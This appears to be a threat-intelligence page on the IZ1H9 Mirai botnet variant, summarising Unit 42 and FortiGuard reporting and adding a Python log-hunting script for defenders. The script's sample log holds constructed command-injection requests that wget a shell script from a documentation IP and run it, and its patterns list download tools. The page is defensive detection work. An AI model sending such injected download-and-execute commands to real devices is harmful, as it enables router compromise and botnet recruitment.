IZ1H9 is a Mirai variant first seen in August 2018 and one of the most active members of the Mirai family. It targets Internet-of-Things (IoT) devices, chiefly consumer and small-office routers and similar embedded Linux systems, by exploiting known vulnerabilities in their firmware. It has been used in multiple campaigns since its discovery, including one against Danish critical infrastructure. IZ1H9 spreads over HTTP, SSH and Telnet, and every device it compromises is enlisted into a botnet that is then directed to launch Distributed Denial of Service (DDoS) attacks against targets chosen by the operators.
Unit 42 researchers have observed multiple campaigns using the IZ1H9 variant since November 2021. The malware exploits a set of vulnerabilities disclosed between 2015 and 2023; one campaign targeted a flaw in the "/cgi-bin/login.cgi" endpoint that Unit 42 could not tie to a specific CVE and believed to affect the Prolink PRC2402M router. Successful exploitation injects a shell command into the device that fetches a shell-script downloader named "l.sh" from an attacker-controlled URL; that script then stages and runs the IZ1H9 bot on the device.
In September 2023, FortiGuard Labs, the research arm of security firm Fortinet, reported a significant expansion of the IZ1H9 DDoS campaign: the malware gained thirteen new exploit payloads targeting Linux-based routers and devices from manufacturers including D-Link, Zyxel, TP-Link and TOTOLINK, among others. The campaign's impact is amplified by how quickly its operators add newly disclosed vulnerabilities to the exploit set. Each device an attacker takes over is folded into the botnet and used to launch further DDoS attacks and brute-force attempts against other devices. Because the botnet relies on publicly known vulnerabilities, unpatched router firmware and management interfaces exposed to the internet are the main exposure.
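The exploitation pattern described in the two paragraphs above (a request to an abused CGI endpoint whose injected command fetches a shell-script downloader and runs it) is something a defender can hunt for in web server or router access logs. The following is an added example for this page, not code from Unit 42, Fortinet or the IZ1H9 operators. It assumes Apache/nginx "combined" log format, treats "/cgi-bin/login.cgi" as the only watched endpoint (extend WATCHED_PATHS with your own device list), and uses constructed log lines: the IP addresses are from RFC 5737 documentation ranges, the query parameter name, the second CGI path and the "bins.sh" file name are illustrative, and only "l.sh" and "/cgi-bin/login.cgi" come from the reporting above.

```python
"""Flag IZ1H9-style download-and-execute chains in HTTP access logs.

Added example for this page; not code from Unit 42, Fortinet or the IZ1H9
operators. Log lines, addresses, parameter names and the "bins.sh" name are
constructed; only "l.sh" and "/cgi-bin/login.cgi" come from public reporting.
"""
import re
from urllib.parse import unquote_plus

# Apache/nginx "combined" log format; only the request target is inspected.
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Endpoint named in the Unit 42 reporting; add your own devices' CGI paths.
WATCHED_PATHS = {"/cgi-bin/login.cgi"}

# Stage 1: fetch a payload over the network.
FETCH_RE = re.compile(r"\b(?:wget|curl|tftp|ftpget)\b", re.I)
# Stage 2: make it executable or run it. The lookbehind stops the ".sh" in a
# file name such as "l.sh" from counting as an "sh" invocation.
EXEC_RE = re.compile(r"\bchmod\b|(?<![\w.])(?:ba)?sh\s+\S|\|\s*(?:ba)?sh\b", re.I)
# The download URL is the indicator most worth extracting for blocking/pivoting.
URL_RE = re.compile(r"(?:https?|tftp|ftp)://[^\s;|&'\"<>]+", re.I)
SCRIPT_RE = re.compile(r"[\w-]+\.sh\b", re.I)


def decode(target: str, rounds: int = 3) -> str:
    """Percent-decode repeatedly so double-encoded payloads are not missed."""
    for _ in range(rounds):
        nxt = unquote_plus(target)
        if nxt == target:
            break
        target = nxt
    return target


def analyze(line: str):
    """Return a hit dict when the request carries a fetch-then-execute chain."""
    m = LOG_RE.match(line)
    if not m:
        return None
    decoded = decode(m["target"])
    path = decoded.split("?", 1)[0]
    fetch = FETCH_RE.search(decoded) is not None
    execute = EXEC_RE.search(decoded) is not None
    scripts = list(dict.fromkeys(SCRIPT_RE.findall(decoded)))  # de-duplicated
    # A lone "wget" in a search query is noise; require a second stage too.
    if not (fetch and (execute or scripts)):
        return None
    watched = path in WATCHED_PATHS
    return {
        "src": m["src"],
        "path": path,
        "watched_path": watched,
        "urls": URL_RE.findall(decoded),
        "scripts": scripts,
        "severity": "high" if watched else "medium",
    }


def scan(lines):
    """Run analyze() over an iterable of log lines and keep the hits."""
    return [hit for hit in map(analyze, lines) if hit]


# Constructed sample log (not captured traffic).
SAMPLE_LOG = [
    # Injected chain against the endpoint named in the Unit 42 reporting.
    '198.51.100.23 - - [06/Sep/2023:08:41:17 +0000] "GET /cgi-bin/login.cgi?'
    'user=admin%27%3Bcd+%2Ftmp%3Bwget+http%3A%2F%2F192.0.2.10%2Fl.sh%3B'
    'chmod+777+l.sh%3Bsh+l.sh%3B%27 HTTP/1.1" 200 178 "-" "Mozilla/5.0"',
    # Ordinary login to the same endpoint.
    '203.0.113.5 - - [06/Sep/2023:08:42:01 +0000] "POST /cgi-bin/login.cgi '
    'HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    # Double-encoded chain against an unwatched (illustrative) CGI path.
    '198.51.100.23 - - [06/Sep/2023:08:43:09 +0000] "GET /cgi-bin/example_status.cgi?'
    'cmd=wget%2520http%253A%252F%252F192.0.2.10%252Fbins.sh%253Bsh%2520bins.sh '
    'HTTP/1.1" 404 0 "-" "curl/7.88.1"',
    # "wget" in a search query: fetch keyword without an execute stage.
    '203.0.113.9 - - [06/Sep/2023:08:44:30 +0000] "GET /search?q=how+to+use+wget+and+curl '
    'HTTP/1.1" 200 4096 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit["severity"], hit["src"], hit["path"], hit["urls"], hit["scripts"])
```

Run against the constructed sample, the first and third lines are flagged (high and medium severity respectively, each with its download URL and script name extracted), while the plain login and the search query are ignored. Requiring both a fetch keyword and an execute stage keeps the rule usable on real traffic; decoding more than once matters because exploit kits routinely double-encode the injected command.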
Description last updated: 2024-11-25T13:44:28.216Z